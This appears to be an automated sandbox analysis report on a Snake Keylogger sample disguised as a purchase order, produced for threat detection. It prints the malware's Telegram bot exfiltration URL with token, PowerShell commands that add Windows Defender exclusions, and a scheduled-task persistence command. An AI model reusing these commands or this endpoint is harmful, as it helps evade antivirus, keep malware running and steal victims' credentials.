Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-02-2025 22:28
Static task
static1
Behavioral task
behavioral1
Sample
newpurchaseorder21125.bat.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
newpurchaseorder21125.bat.exe
Resource
win10v2004-20250217-en
General
-
Target
newpurchaseorder21125.bat.exe
-
Size
710KB
-
MD5
581ca4f5f57c1301c959df445bc71d94
-
SHA1
60fa7a21db1d35f2919837f074228c5b0caa2b12
-
SHA256
ae1a70825040f157d78228d5668ffa7f2759fdf83293e35c351e5b4e8d035c4f
-
SHA512
c39841d137f253682c516a3a9cc7cf6919474d92705d4758ca9e06e7adf96d5e7f02a37ef099900796aec14dd0fe961a9be491674af8598228961506a3dc9ae4
-
SSDEEP
12288:std4fURnHb+Qv6HNbwVUd4/HOvySUYHjH6MgCrHIiLQ7WiJu9VKAJy97UcdnVfU/:i4MRHPv6tkVUd0HOqjYH76MrzIi2WrVx
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7775393615:AAHn5BUezoc-Je4U55mzXmsPfsuGEAoG2EA/sendMessage?chat_id=2135869667
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 5 IoCs
resource yara_rule behavioral1/memory/2812-28-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2812-30-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2812-29-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2812-25-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2812-23-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2140 powershell.exe 2780 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 checkip.dyndns.org 8 reallyfreegeoip.org 9 reallyfreegeoip.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3032 set thread context of 2812 3032 newpurchaseorder21125.bat.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newpurchaseorder21125.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2864 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3032 newpurchaseorder21125.bat.exe 3032 newpurchaseorder21125.bat.exe 2812 RegSvcs.exe 2780 powershell.exe 2140 powershell.exe 2812 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3032 newpurchaseorder21125.bat.exe Token: SeDebugPrivilege 2812 RegSvcs.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3032 wrote to memory of 2140 3032 newpurchaseorder21125.bat.exe 31 PID 3032 wrote to memory of 2140 3032 newpurchaseorder21125.bat.exe 31 PID 3032 wrote to memory of 2140 3032 newpurchaseorder21125.bat.exe 31 PID 3032 wrote to memory of 2140 3032 newpurchaseorder21125.bat.exe 31 PID 3032 wrote to memory of 2780 3032 newpurchaseorder21125.bat.exe 33 PID 3032 wrote to memory of 2780 3032 newpurchaseorder21125.bat.exe 33 PID 3032 wrote to memory of 2780 3032 newpurchaseorder21125.bat.exe 33 PID 3032 wrote to memory of 2780 3032 newpurchaseorder21125.bat.exe 33 PID 3032 wrote to memory of 2864 3032 newpurchaseorder21125.bat.exe 35 PID 3032 wrote to memory of 2864 3032 newpurchaseorder21125.bat.exe 35 PID 3032 wrote to memory of 2864 3032 newpurchaseorder21125.bat.exe 35 PID 3032 wrote to memory of 2864 3032 newpurchaseorder21125.bat.exe 35 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 PID 3032 wrote to memory of 2812 3032 newpurchaseorder21125.bat.exe 37 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\newpurchaseorder21125.bat.exe"C:\Users\Admin\AppData\Local\Temp\newpurchaseorder21125.bat.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\newpurchaseorder21125.bat.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IPzgiZQdhTbS.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IPzgiZQdhTbS" /XML "C:\Users\Admin\AppData\Local\Temp\tmp23E5.tmp"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2864
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2812
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57bf022b0876d6f1f88279b5ad99fdfe3
SHA123e64c8ebfd39ca44e91b4b86021f0faefa8f1a1
SHA25610446b2304ea99fb9ad3f5973e3039fa50937a8f1dee1881b7f3546b1892153a
SHA5127f578a0257eb9387e92bda19e67fcb065927dd7412de736d4ad3b0365bd81bf8e9f504b81323dcef11c5eb32faaa334673aca53d0b132022ac21c5300a368430
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z0YFJ4LQY0DWUH8PWJKH.temp
Filesize7KB
MD59ecc574b1e3f5e1e522dd3801c86b7fb
SHA17dac90d932ef85a9eda4da2260e94da935af97f4
SHA256e58238379d462d24299d9d808ebbf1334f7b8469edf94dfae6973fdc1aa06189
SHA51218b19a9933602fab492d88ffc63810fef77dbf5b2e8450845c1121a711ba004ef3e1a34b5b77f934c0f6f055a0b4a7b31713ea4765f3275dd0813e35613acb87